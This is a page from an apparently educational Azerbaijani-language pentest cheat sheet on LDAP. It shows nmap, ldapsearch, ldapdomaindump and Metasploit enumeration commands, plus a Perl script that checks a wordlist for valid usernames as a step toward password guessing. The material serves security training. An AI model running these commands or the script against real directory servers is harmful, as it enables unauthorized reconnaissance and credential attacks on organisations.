Pentest və SOC Cheat Sheet
  • Reconnaissance
  • Post-Explotation
    • Linux Post-Explotation
      • Linux Local Enumeration
      • Linux Privilege Escalation
      • Dumping and cracking hashes on Linux
      • Linux Persistence
    • Windows Post-Explotation
      • Windows Local Enumeration
      • Windows Privilege Escalation
      • Windows Persistence
  • Network Services Pentesting
    • 21-Pentesting FTP
    • 22-Pentesting SSH
    • 23-Pentesting Telnet
    • 53-Pentesting DNS
    • 25,465,587-Pentesting SMTP
    • 110,995-Pentesting POP
    • 139,445-Pentesting SMB
    • 3306-Pentesting MySQL
    • 3389-Pentesting RDP
    • 1433-Pentesting MSSQL-Microsoft SQL Server
    • 389,636,3268,3269-Pentesting LDAP
  • Web Pentesting
    • Broken Access Control
      • Praktiki nümunə
    • OS Command Injection
      • Praktiki nümunə
    • SQL Injection
      • Praktiki nümunə
    • Cross-Site-Scripting (XSS)
      • Praktiki nümunə
    • File Upload
      • Praktiki nümunə
    • Directory Traversal və Path Traversal
      • Praktiki nümunə
    • CSRF
    • XXE
    • Clickjacking
      • Praktiki nümunə
    • SSRF
      • Praktiki nümunə
    • JWT (Json Web Token)
      • Praktiki nümunə
    • Local&Remote File İnclusion
      • Praktiki nümunə
      • Local File inclusion ilə reverse shell almaq
    • 401&403 Bypass
    • Login Bypass
    • Open Redirect
    • Unicode Injection
    • Security Misconfiguration
    • CRLF injection
    • LDAP Injection
    • Cookies Hacking
    • Cross site WebSocket hijacking (CSWSH)
    • SSTI (Server Side Template Injection)
    • CSTI (Client Side Template Injection)
    • XSLT Server Side Injection (Extensible Stylesheet Languaje Transformations)
    • Registration & Takeover Vulnerabilities
    • Regular expression Denial of Service - ReDoS
    • Reset/Forgotten Password Bypass
    • SAML Hücumları
    • Reverse Tab Nabbing
    • Web Tool - WFuzz
    • XPATH enjeksiyonu
    • Server-Side Includes (SSI) Injection
    • Edge Side Inclusion Injection (ESII)
    • Race Condition
    • PostMessage
    • Parameter Pollution
    • Cache Poisoning and Cache Deception
    • Captcha Bypass
  • AD Pentesting
    • Domain Enumeration
      • PowerView ilə enumeration
      • AD Module ilə enumeration
      • BloodHound ilə enumeration
        • On Site BloodHound
      • Using Adalanche
        • Remote adalanche
      • Useful Enumeration Tools
    • Local Privilege Escalation
      • Useful Local Priv Esc Tools
      • UAC Bypass
    • Lateral Movement
      • Powershell Remoting
      • Mimikatz
      • Remote Desktop Protocol
      • URL File Attacks
      • Useful Tools
    • Domain Privilege Escalation
      • Kerberoast
      • ASREPRoast
      • Password Spray Attack
      • Force Set SPN
      • Abusing Shadow Copies
      • List and Decrypt Stored Credentials using Mimikatz
      • Unconstrained Delegation
      • Constrained Delegation
      • Resource Based Constrained Delegation
      • DNSAdmins Abuse
      • Abusing Active Directory-Integraded DNS (ADIDNS) poisoning
      • Abusing Backup Operators Group
      • SID History Abuse
      • Active Directory Certificate Services
    • Domain Persistence
      • Golden Ticket Attack
      • Silver Ticket Attack
      • Skeleton Key Attack
      • DSRM Abuse
      • DCsync Attack
    • Cross Forest Attacks
      • Trust Tickets
      • Abuse MSSQL Servers
      • Breaking Forest Trusts
  • SOC - Cheat Sheet
    • SOC Nədir?
    • SOC Komponentləri Nələrdir?
    • SOC Checklist
    • SIEM
      • Splunk Qurulması və Konfiqurasiyası
    • IDS/IPS
    • Firewall
    • Firewall qurulması və konfiqurasiyası
    • EDR/XDR
    • SOAR
    • Windows Commands for SOC analysts
      • GUI Programs in Windows
      • Event Viewer
      • Task Scheduler
      • Group Policy Editor
      • Device Manager
      • Task Manager
      • Registry Manager
    • Linux Commands for SOC analysts
    • LOLBAS Apps and Commands
      • Apps and Commands
Powered by GitBook
On this page
  • Credentials ilə
  • Credentials olmadan
  • -b: base dn for search
  • -D: bind DN
  • -w: bind password
  • -H: IP
  • --no-html: HTML çıxışını söndürün
  • --to-grep: grepable çıxışı söndürün
  • -to: Çıxış dir

Was this helpful?

  1. Network Services Pentesting

389,636,3268,3269-Pentesting LDAP

Previous1433-Pentesting MSSQL-Microsoft SQL ServerNextWeb Pentesting

Last updated 1 year ago

Was this helpful?

LDAP (Lightweight Directory Access Protocol) istər ictimai İnternetdə, istərsə də korporativ intranetdə hər kəsə təşkilatları, şəxsləri və fayl və qurğular kimi şəbəkədəki digər resursları tapmaq imkanı verən proqram protokoludur. LDAP Kataloq Giriş Protokolunun (DAP) "yüngül" (daha az miqdarda kod) versiyasıdır.

Default port: 389 və 636 (ldaps). Qlobal Kataloq (Active Directory-də LDAP) standart olaraq 3268 və LDAPS üçün 3269 portlarında mövcuddur.

Script ldap-search

LDAP axtarışını həyata keçirməyə cəhd edir və bütün uyğunluqları qaytarır.

Skriptə heç bir istifadəçi adı və parol təqdim edilmədikdə, Nmap reyestrinə müraciət edilir. Ldap-brute skripti seçilibsə və etibarlı hesab tapıbsa, bu hesab istifadə olunacaq. Deyilsə, anonim bağlama son cəhd kimi istifadə olunacaq.

SCRIPTS

ldap.searchattrib

'Xüsusi' qfiltr ilə istifadə edildikdə, bu parametr istifadəçiyə axtarış meyarları kimi fərdi atribut və dəyəri təyin etməyə imkan vermək üçün ldap.searchvalue ilə birlikdə işləyir.

ldap.maxobjects

Əgər təyin edilərsə, skript tərəfindən qaytarılan obyektlərin sayını əvəz edir (defolt 20). -1 dəyəri limiti tamamilə aradan qaldırır.

ldap.qfilter

Quraşdırılıbsa, sürətli filtri təyin edir. Kitabxana real LDAP filtrlərinin təhlilini dəstəkləmir. Filtr parametri üçün aşağıdakı dəyərlər etibarlıdır: kompüter, istifadəçilər, ad_dcs, xüsusi və ya hamısı. Heç bir dəyər göstərilməyibsə, defolt olaraq hamıya verilir.

ldap.attrib

Əgər təyin edilərsə, axtarışa yalnız göstərilən atributlar daxil olacaq. Tək atribut üçün sətir dəyəri istifadə oluna bilər, əgər birdən çox atributun verilməsi lazımdırsa, bunun əvəzinə cədvəldən istifadə edilməlidir.

ldap.searchvalue

'Xüsusi' qfiltr ilə istifadə edildikdə, bu parametr istifadəçiyə axtarış meyarları kimi fərdi atribut və dəyəri təyin etmək imkanı vermək üçün ldap.searchattrib ilə birlikdə işləyir. Bu parametr '*' ulduz işarəsinin joker işarə kimi istifadəsinə İCAZƏ VERİR.

ldap.password

Quraşdırılıbsa, LDAP serverinə autentifikasiya etmək üçün istifadəçi adı ilə birlikdə istifadə olunur

ldap.savesearch

Əgər təyin edilərsə, skript çıxışı göstərilən yol və adla başlayan faylda saxlayacaqdır. .CSV fayl şəkilçisi, eləcə də host adı və port seçilmiş çıxış növü əsasında avtomatik əlavə olunacaq.

ldap.username

Quraşdırılıbsa, skript istifadəçi adı və paroldan istifadə edərək LDAP bağlamasını yerinə yetirməyə çalışacaq

ldap.base

Əgər təyin edilərsə, skript onu axtarış üçün əsas kimi istifadə edəcək. Defolt olaraq defaultNamingContext alınır və istifadə olunur. Əgər defaultNamingContext mövcud deyilsə, skript mövcud adlandırma kontekstləri üzərində təkrarlanır.

nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest, ldap.qfilter=users,ldap.attrib=sAMAccountName' <host>

Ldapdomaindump

Credentials ilə

ldapdomaindump -u security.local\\\\<User> -p '<Password>' ldap://<IP>

Credentials olmadan

ldapdomaindump ldap://<IP>

Search LDAP

cn - Common Name

dc - Domain Component

ou - Organizational Unit

-b: base dn for search

-D: bind DN

-w: bind password

-H: IP

ldapsearch -x -H ldap://10.0.0.1 -b "dc=example,dc=com" -D "cn=admin,dc=example,dc=com" -w password

Credentiallar varsa, Active Directory məlumatını LDAP vasitəsilə əldə edə bilərsiniz.

--no-html: HTML çıxışını söndürün

--to-grep: grepable çıxışı söndürün

-to: Çıxış dir

ldapdomaindump -u 'DOMAIN\\username' -p password <target-ip> --no-html --no-grep -o dumped

Unauthenticated Bind Enumeration (DN with no password)

DN cn=admin,dc=acme,dc=com və parol olmadan istifadə edərək kataloq alt ağacında bütün istifadəçi identifikatorlarını axtarmağa cəhd edək.

Doğrulanmamış Bağlamalara yalnız Anonim Bağlamalar da aktiv olduqda icazə verilir.

Authenticated Bind Enumeration

Doğrulanmış LDAP bağlaması üçün bəzi parolları, tercihen ldap administratorlarını sındırmalıyıq. Biz həmçinin md5 və s. kimi istifadə edilən identifikasiyanı müəyyən etməliyik.

Saxta paroldan istifadə edərək və daxil olmağa çalışaraq identifikasiya metodunu əldə edə bilərik

Etibarlı istifadəçiləri tapmaq üçün attack

Aşağıdakı sadə skript etibarlı istifadəçiləri axtarır və tapılarsa, seçilən adı qaytarır. Bu, bu axtarışda tapdığımız hesablar üçün parolları təxmin etmək olan növbəti addımımızda bizə kömək edəcək.

#!/usr/bin/env perl
use strict;
use warnings;
use Net::LDAP;my $server   = "ldap.acme.com";
my $base     = "dc=acme,dc=com";
my $filename = "users.txt";open(my $fh, '<', $filename) or die $!;my $ldap = Net::LDAP->new($server) or die $@;while (my $word = <$fh>) {
chomp($word);    my $search = $ldap->search(
base    => $base,
scope   => 'sub',
filter  => '(&(uid='.$word.'))',
attrs   => ['dn']
);    print "[+] Found valid login name $word\\n" if(defined($search->entry));

}

İndi skripti işlədirik

sam@asus:~/public_html% ./ldap-users.pl
[+] Found valid login name twest
[+] Found valid login name vpatel
[+] Found valid login name hahmad
[+] Found valid login name ealvarez
[+] Found valid login name skumar

Metasploit

LDAP Enumeration

use auxiliary/gather/ldap_query
run rhost=192.168.123.13 [email protected] password=p4$$w0rd action=ENUM_ACCOUNTS